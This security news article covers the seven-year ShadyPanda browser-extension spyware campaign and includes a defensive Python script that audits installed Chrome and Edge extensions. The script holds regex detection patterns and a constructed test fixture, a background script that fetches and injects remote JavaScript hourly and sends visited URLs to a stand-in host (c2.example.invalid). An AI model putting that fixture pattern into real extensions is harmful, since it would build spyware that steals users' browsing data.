Seven-Year Browser Extension Campaign Exposed: 4.3 Million Users Compromised

Introduction

A massive, long-running browser extension operation has come to light, revealing how cybercriminals exploited trust and legitimacy to quietly compromise millions of users. The group behind this campaign, known as ShadyPanda, leveraged popular Chrome and Edge extensions to collect sensitive browsing data, install spyware, and evade detection for years. This case underscores the growing risks associated with browser extensions and the urgent need for vigilance in managing digital tools.

ShadyPanda’s Stealth Campaign

A new report by Koi Security exposes a seven-year-long malware operation that affected over 4.3 million users of Chrome and Edge. ShadyPanda operated through trusted browser marketplaces, initially offering seemingly harmless extensions, only to later push malicious updates. Five extensions, including the widely used Clean Master, contained a remote code execution backdoor impacting around 300,000 users.

These extensions had been available since 2018 and behaved legitimately until mid-2024, when updates added a background routine that fetched and executed arbitrary JavaScript from the operators' servers every hour, long after the code had passed store review. The injected code tracked website visits, exfiltrated browsing histories (encrypted before transmission to hide them from casual inspection), and captured complete browser fingerprints.

Simultaneously, another spyware operation targeted Microsoft Edge users, reaching over 4 million through five extensions, most notably WeTab, which alone had 3 million installs. This malware collected every URL visited, search term, mouse click, and browser identifier, sending the data to servers in China.

ShadyPanda’s origins trace back to 2018, beginning with 145 browser extensions disguised as wallpapers or productivity tools. These add-ons injected affiliate codes on shopping websites and used Google Analytics to track user behavior. Researchers identified three factors that allowed ShadyPanda to persist: limited post-approval monitoring of updates, the high trust users and marketplaces place in extensions with large install counts, and the credibility that comes from years of apparently legitimate operation.

By early 2024, ShadyPanda escalated its attacks. One extension, Infinity V+, redirected searches through a known hijacker, harvested cookies, and transmitted keystrokes to external servers. While many malicious extensions were eventually removed, the group continually refined its strategies. Koi Security highlights that static analysis at the time of submission, coupled with minimal ongoing monitoring, allowed these campaigns to succeed. Clean Master, for example, remained legitimate for five years before turning malicious.

Users are now advised to audit their browser extensions regularly, remove tools they do not need, review the permissions each remaining extension requests, and prefer developers with clear, transparent update histories.
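The backdoor pattern the report describes (a timer that fetches JavaScript from a remote server and runs it, alongside hooks that log every navigation) leaves fingerprints in an extension's manifest and source, so the audit advice above can be partly automated. The script below is an added example, not code from the Koi Security report or from any of the named extensions: it walks a Chrome/Edge profile's Extensions folder, flags broad permissions and load-and-execute indicators, and ranks extensions by a simple risk score. The profile paths, the permission set, the regexes and the scoring weights are assumptions chosen for illustration, and the two sample extensions it builds in a temp directory are constructed test data, not real store listings.

```python
"""Audit locally installed Chrome/Edge extensions for remote-code-loading and
data-harvesting indicators. Heuristic triage, not proof of malice."""
import json
import re
import tempfile
from pathlib import Path

# Assumed default profile locations; adjust for non-default profiles.
DEFAULT_ROOTS = [
    Path.home() / "AppData/Local/Google/Chrome/User Data/Default/Extensions",
    Path.home() / "AppData/Local/Microsoft/Edge/User Data/Default/Extensions",
    Path.home() / "Library/Application Support/Google/Chrome/Default/Extensions",
    Path.home() / "Library/Application Support/Microsoft Edge/Default/Extensions",
    Path.home() / ".config/google-chrome/Default/Extensions",
    Path.home() / ".config/microsoft-edge/Default/Extensions",
]

# Permissions (or match patterns) that expose every site the user visits.
HIGH_RISK_PERMISSIONS = {
    "<all_urls>", "*://*/*", "http://*/*", "https://*/*", "webRequest",
    "webRequestBlocking", "cookies", "history", "tabs", "scripting", "webNavigation",
}

# Source patterns for fetching code at runtime, executing it, and logging activity.
CODE_PATTERNS = {
    "remote_fetch": re.compile(r"\bfetch\s*\(\s*[\"']https?://"),
    "dynamic_eval": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "script_injection": re.compile(r"createElement\s*\(\s*[\"']script[\"']"),
    "periodic_timer": re.compile(r"\b(setInterval|chrome\.alarms\.create)\s*\("),
    "url_harvest": re.compile(r"chrome\.(tabs\.onUpdated|webNavigation\.\w+)\.addListener"),
    "input_capture": re.compile(r"addEventListener\s*\(\s*[\"'](keydown|keypress|click)[\"']"),
}


def _manifest_permissions(manifest):
    """Flatten the fields that grant page access, covering MV2 and MV3 layouts."""
    perms = set(manifest.get("permissions", []))
    perms.update(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms.update(cs.get("matches", []))
    return perms


def audit_extension(ext_dir):
    """Score one unpacked extension directory (the one holding manifest.json)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    risky = sorted(_manifest_permissions(manifest) & HIGH_RISK_PERMISSIONS)
    indicators = {}
    for js in ext_dir.rglob("*.js"):
        src = js.read_text(encoding="utf-8", errors="replace")
        for name, pattern in CODE_PATTERNS.items():
            if pattern.search(src):
                indicators.setdefault(name, []).append(js.relative_to(ext_dir).as_posix())
    score = len(risky) + 2 * len(indicators)
    # Fetch-then-execute is the backdoor shape: code the store never reviewed
    # runs in the user's browser. Weight that combination heavily (assumed weight).
    if "remote_fetch" in indicators and indicators.keys() & {"dynamic_eval", "script_injection"}:
        score += 5
    return {"path": str(ext_dir), "name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"), "risky_permissions": risky,
            "indicators": indicators, "score": score}


def audit_extensions_root(root):
    """Walk <Extensions>/<id>/<version>/manifest.json and return results, riskiest first."""
    results = [audit_extension(m.parent) for m in Path(root).glob("*/*/manifest.json")]
    return sorted(results, key=lambda r: r["score"], reverse=True)


def build_sample_root():
    """Constructed fixture: one harmless extension and one shaped like the reported
    backdoor (hourly remote fetch injected into pages, plus navigation logging)."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    benign = root / "aaaa" / "1.0_0"
    benign.mkdir(parents=True)
    (benign / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Plain Wallpaper", "version": "1.0",
        "permissions": ["storage"]}), encoding="utf-8")
    (benign / "bg.js").write_text('chrome.storage.local.set({theme: "dark"});\n', encoding="utf-8")
    shady = root / "bbbb" / "2.7_0"
    shady.mkdir(parents=True)
    (shady / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Cleaner Pro", "version": "2.7",
        "permissions": ["tabs", "cookies", "webNavigation", "alarms"],
        "host_permissions": ["<all_urls>"]}), encoding="utf-8")
    (shady / "bg.js").write_text(
        'chrome.alarms.create("sync", {periodInMinutes: 60});\n'
        'chrome.alarms.onAlarm.addListener(async () => {\n'
        '  const r = await fetch("https://c2.example.invalid/p.js");\n'
        '  const s = document.createElement("script"); s.textContent = await r.text();\n'
        '});\n'
        'chrome.webNavigation.onCompleted.addListener(d => fetch("https://c2.example.invalid/log?u=" + d.url));\n',
        encoding="utf-8")
    return root


if __name__ == "__main__":
    roots = [r for r in DEFAULT_ROOTS if r.is_dir()] or [build_sample_root()]
    for root in roots:
        for r in audit_extensions_root(root):
            print(f'{r["score"]:3d}  {r["name"]} {r["version"]}  '
                  f'perms={r["risky_permissions"]}  indicators={sorted(r["indicators"])}')
```

Run it as-is to audit the profiles it finds, or against the constructed fixture when none exist; a high score is a prompt to read the flagged files, not a verdict. Two limits matter in practice: obfuscated or minified payloads will evade the regexes, and an extension that only starts fetching remote code after an update (the behaviour described above) is invisible until that update lands, which is why the audit is worth rerunning after every extension update rather than once.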

What Undercode Say: Strategic Insights

ShadyPanda’s campaign illustrates a sophisticated exploitation of digital trust. Unlike typical malware attacks that rely on immediate exploitation or phishing, ShadyPanda leveraged legitimacy, patience, and marketplace trust, turning browser extensions into long-term spyware delivery mechanisms.

The methodology of the group shows how attackers adapt to detection frameworks. Initially, the group focused on affiliate code injection, a low-severity abuse that is profitable and rarely treated as malware by store reviewers. This allowed ShadyPanda to build credibility and a high install count without raising suspicion. Over time, as user trust solidified, they shifted to remote code execution, fetching arbitrary JavaScript on a schedule and exfiltrating data in real time.

The focus on both Chrome and Edge demonstrates a multi-platform strategy. By diversifying targets, ShadyPanda maximized impact and reduced reliance on a single marketplace’s security measures. The staggering volume of compromised users, over 4.3 million, is a testament to the effectiveness of this approach.

Koi Security’s report also exposes fundamental weaknesses in the extension review system. Static analysis at submission is insufficient, because a review of the submitted code cannot detect malicious behaviour introduced by a later update, let alone code that is fetched from a remote server only after installation. ShadyPanda exploited this gap by maintaining legitimate functionality for years, only triggering harmful behavior later. This indicates that the browser extension ecosystem requires review of every update, not just the initial submission, combined with continuous behavioral monitoring of what published extensions actually do at runtime.

Moreover, the data collection practices, logging URLs, search terms, clicks, cookies, and keystrokes, suggest a dual purpose: commercial profiling and potentially state-level surveillance. Exfiltrating the data to servers in China adds geopolitical complexity, raising questions about how cybercrime networks intersect with international data flows.

For users, the lessons are clear. Regular audits of installed extensions, careful evaluation of update histories, and skepticism toward seemingly trusted tools are essential. Developers with transparency and frequent code reviews reduce risk, but systemic changes in marketplace monitoring are critical. Without reform, attackers will continue to exploit trust and legitimacy as long-term strategies.

ShadyPanda’s campaign also signals a shift in the threat landscape. Cybercriminals increasingly adopt patient, multi-year approaches that capitalize on human and systemic trust. Quick fixes, like removing one malicious extension, may not be sufficient if marketplaces cannot enforce ongoing scrutiny. Users and organizations must treat browser extensions as active security considerations, not passive utilities.

Fact Checker Results

✅ ShadyPanda operated over seven years, affecting more than 4.3 million users.
✅ Malicious updates began in mid-2024 for previously legitimate extensions.
❌ The claim that only Chrome was affected is false; Microsoft Edge extensions were also targeted.

Prediction

📊 Browser extension attacks will likely increase in sophistication. Expect future campaigns to leverage long-term legitimacy and automated JavaScript payloads. Users who fail to audit their extensions may face data breaches, and marketplaces will need to adopt continuous monitoring systems to counter these threats.

References:

Reported By: www.infosecurity-magazine.com